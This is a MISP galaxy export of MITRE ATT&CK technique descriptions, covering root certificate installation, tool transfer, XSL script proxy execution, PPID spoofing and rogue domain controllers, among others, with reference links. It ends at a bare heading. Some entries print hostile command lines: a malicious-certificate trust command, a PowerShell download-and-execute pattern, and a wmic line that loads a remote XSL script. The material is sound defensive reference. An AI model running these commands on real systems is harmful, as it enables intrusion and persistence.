This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1301).

Business processes, such as who typically communicates with who, or what the supply chain is for a particular part, provide opportunities for social engineering or other (Citation: Warwick2015)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze business processes - T1301"

Table 5793. Table References

Links

https://attack.mitre.org/techniques/T1301

Install Root Certificate - T1130

Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root’s chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)

Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)

In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1130"

Table 5794. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf

https://attack.mitre.org/techniques/T1130

https://capec.mitre.org/data/definitions/479.html

https://docs.microsoft.com/sysinternals/downloads/sigcheck

https://en.wikipedia.org/wiki/Root_certificate

https://objective-see.com/blog/blog_0x26.html

https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/

https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/

Modify Existing Service - T1031

Windows service configuration information, including the file path to the service’s executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).

Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.

Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Existing Service - T1031"

Table 5795. Table References

Links

https://attack.mitre.org/techniques/T1031

https://capec.mitre.org/data/definitions/551.html

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662(v=ws.11)

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://twitter.com/r0wdy_/status/936365549553991680

Device Administrator Permissions - T1401

Adversaries may request device administrator permissions to perform malicious actions.

By abusing the device administration API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Device Lockout](https://attack.mitre.org/techniques/T1446), factory resetting the device to [Delete Device Data](https://attack.mitre.org/techniques/T1447) and any traces of the malware, disabling all of the device’s cameras, or make it more difficult to uninstall the app.(Citation: Android DeviceAdminInfo)

Device administrators must be approved by the user at runtime, with a system popup showing which of the actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.

The tag is: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401"

Table 5796. Table References

Links

https://attack.mitre.org/techniques/T1401

https://developer.android.com/reference/android/app/admin/DeviceAdminInfo

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

Ingress Tool Transfer - T1105

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).

On Windows, adversaries may use various utilities to download tools, such as copy, finger, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.(Citation: t1105_lolbas)

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts.

Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service’s web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim’s machine.(Citation: Dropbox Malware Sync)

The tag is: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"

Table 5797. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1105

https://lolbas-project.github.io/#t1105

https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf

https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/

Graphical User Interface - T1061

This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.

The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system’s GUI during an operation, commonly through a remote interactive session such as [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command (Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.

The tag is: misp-galaxy:mitre-attack-pattern="Graphical User Interface - T1061"

Table 5798. Table References

Links

https://attack.mitre.org/techniques/T1061

https://en.wikipedia.org/wiki/Run_command

Modify System Image - T1601

Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.

To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.

The tag is: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601"

Table 5799. Table References

Links

https://attack.mitre.org/techniques/T1601

https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

https://tools.cisco.com/security/center/resources/integrity_assurance.html#7

Application Deployment Software - T1017

Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.

Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

The tag is: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017"

Table 5800. Table References

Links

https://attack.mitre.org/techniques/T1017

https://capec.mitre.org/data/definitions/187.html

Application Layer Protocol - T1071

Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.

The tag is: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071"

Table 5801. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1071

Credentials in Files - T1081

Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)

In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)

The tag is: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081"

Table 5802. Table References

Links

http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx

http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html

https://attack.mitre.org/techniques/T1081

https://capec.mitre.org/data/definitions/639.html

https://posts.specterops.io/head-in-the-clouds-bd038bb69e48

Remote System Discovery - T1018

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).

Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.

Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018"

Table 5803. Table References

Links

https://attack.mitre.org/techniques/T1018

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

https://www.us-cert.gov/ncas/alerts/TA18-106A

Indirect Command Execution - T1202

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)

Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202"

Table 5804. Table References

Links

https://attack.mitre.org/techniques/T1202

https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe

https://twitter.com/Evi1cg/status/935027922397573120

https://twitter.com/vector_sec/status/896049052642533376

XSL Script Processing - T1220

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)

Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)

Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)

  • <code>msxsl.exe customers[.]xml script[.]xsl</code>

  • <code>msxsl.exe script[.]xsl script[.]xsl</code>

  • <code>msxsl.exe script[.]jpeg script[.]jpeg</code>

Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)

Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)

  • Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>

  • Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>

The tag is: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220"

Table 5805. Table References

Links

https://attack.mitre.org/techniques/T1220

https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script

https://lolbas-project.github.io/lolbas/Binaries/Wmic/

https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75

https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/

https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/

https://twitter.com/dez_/status/986614411711442944

https://www.microsoft.com/download/details.aspx?id=21714

Standard Cryptographic Protocol - T1032

Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.

The tag is: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032"

Table 5806. Table References

Links

http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1032

https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html

https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf

Derive intelligence requirements - T1230

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1230).

Leadership or key decision makers may derive specific intelligence requirements from Key Intelligence Topics (KITs) or Key Intelligence Questions (KIQs). Specific intelligence requirements assist analysts in gathering information to establish a baseline of information about a topic or question and collection managers to clarify the types of information that should be collected to satisfy the requirement. (Citation: LowenthalCh4) (Citation: Heffter)

The tag is: misp-galaxy:mitre-attack-pattern="Derive intelligence requirements - T1230"

Table 5807. Table References

Links

https://attack.mitre.org/techniques/T1230

Custom Cryptographic Protocol - T1024

Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.

Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.

Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors. (Citation: F-Secure Cosmicduke)

The tag is: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024"

Table 5808. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1024

https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf

https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf

Domain Generation Algorithms - T1520

Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1520) (DGAs) to procedurally generate domain names for command and control communication, and other uses such as malicious application distribution.(Citation: securelist rotexy 2018)

DGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1520"

Table 5809. Table References

Links

https://attack.mitre.org/techniques/T1520

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/

Parent PID Spoofing - T1502

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](Rundll32(https://attack.mitre.org/techniques/T1085) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via VBA [Scripting](https://attack.mitre.org/techniques/T1064) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)

Explicitly assigning the PPID may also enable [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) (given appropriate access rights to the parent process). For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1502"

Table 5810. Table References

Links

https://attack.mitre.org/techniques/T1502

https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/

https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/

https://blog.xpnsec.com/becoming-system/

https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags

https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works

https://www.countercept.com/blog/detecting-parent-pid-spoofing/

https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3

Reflective Code Loading - T1620

Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)

Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)

The tag is: misp-galaxy:mitre-attack-pattern="Reflective Code Loading - T1620"

Table 5811. Table References

Links

https://0x00sec.org/t/super-stealthy-droppers/3715

https://attack.mitre.org/techniques/T1620

https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html

https://thewover.github.io/Introducing-Donut/

https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/

https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique

https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/

https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/

https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/

Rogue Domain Controller - T1207

Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)

The tag is: misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207"

Table 5812. Table References

Links

https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html

https://adsecurity.org/?page_id=1821

https://attack.mitre.org/techniques/T1207

https://github.com/shellster/DCSYNCMonitor

https://msdn.microsoft.com/en-us/library/ms677626.aspx

https://www.dcshadow.com/

Software Deployment Tools - T1072

Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).

Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. Network infrastructure may also have administration tools that can be similarly abused by adversaries. (Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it’s intended purpose.

The tag is: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072"

Table 5813. Table References

Links

https://attack.mitre.org/techniques/T1072

https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

System Information Discovery - T1082

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an example, adversaries with user-level access can execute the <code>df -aH</code> command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)

Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)

The tag is: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"

Table 5814. Table References

Links

https://attack.mitre.org/techniques/T1082

https://cloud.google.com/compute/docs/reference/rest/v1/instances

https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html

https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/

https://www.us-cert.gov/ncas/alerts/TA18-106A

Windows Remote Management - T1028

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1028"

Table 5815. Table References

Links

http://msdn.microsoft.com/en-us/library/aa384426

https://attack.mitre.org/techniques/T1028

https://capec.mitre.org/data/definitions/555.html

https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc

https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2

Commonly Used Port - T1043

This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as

  • TCP:80 (HTTP)

  • TCP:443 (HTTPS)

  • TCP:25 (SMTP)

  • TCP/UDP:53 (DNS)

They may use the protocol associated with the port or a completely different protocol.

For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are

  • TCP/UDP:135 (RPC)

  • TCP/UDP:22 (SSH)

  • TCP/UDP:3389 (RDP)

The tag is: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"

Table 5816. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1043

Private whois services - T1305

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1305).

Every domain registrar maintains a publicly viewable database that displays contact information for every registered domain. Private 'whois' services display alternative information, such as their own company data, rather than the owner of the domain. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Private whois services - T1305"

Table 5817. Table References

Links

https://attack.mitre.org/techniques/T1305

Security Software Discovery - T1063

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Windows

Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.

Mac

It’s becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.

The tag is: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063"

Table 5818. Table References

Links

https://attack.mitre.org/techniques/T1063

Test physical access - T1360

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1360).

An adversary can test physical access options in preparation for the actual attack. This could range from observing behaviors and noting security precautions to actually attempting access. (Citation: OCIAC Pre Incident Indicators) (Citation: NewsAgencySpy)

The tag is: misp-galaxy:mitre-attack-pattern="Test physical access - T1360"

Table 5819. Table References

Links

https://attack.mitre.org/techniques/T1360

Exploit TEE Vulnerability - T1405

A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The adversary could then obtain privileges held by the TEE potentially including the ability to access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated operating system privileges may be first required in order to have the ability to attack the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to exploit the operating system (Citation: laginimaineb-TEE).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit TEE Vulnerability - T1405"

Table 5820. Table References

Links

http://bits-please.blogspot.co.il/2016/05/war-of-worlds-hijacking-linux-kernel.html

https://attack.mitre.org/techniques/T1405

https://bits-please.blogspot.in/2016/06/extracting-qualcomms-keymaster-keys.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

https://usmile.at/symposium/program/2015/ekberg

https://usmile.at/symposium/program/2015/thomas-holmes

Account Access Removal - T1640

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: credentials changed) to remove access to accounts.

The tag is: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1640"

Table 5821. Table References

Links

https://attack.mitre.org/techniques/T1640

Network Service Discovery - T1046

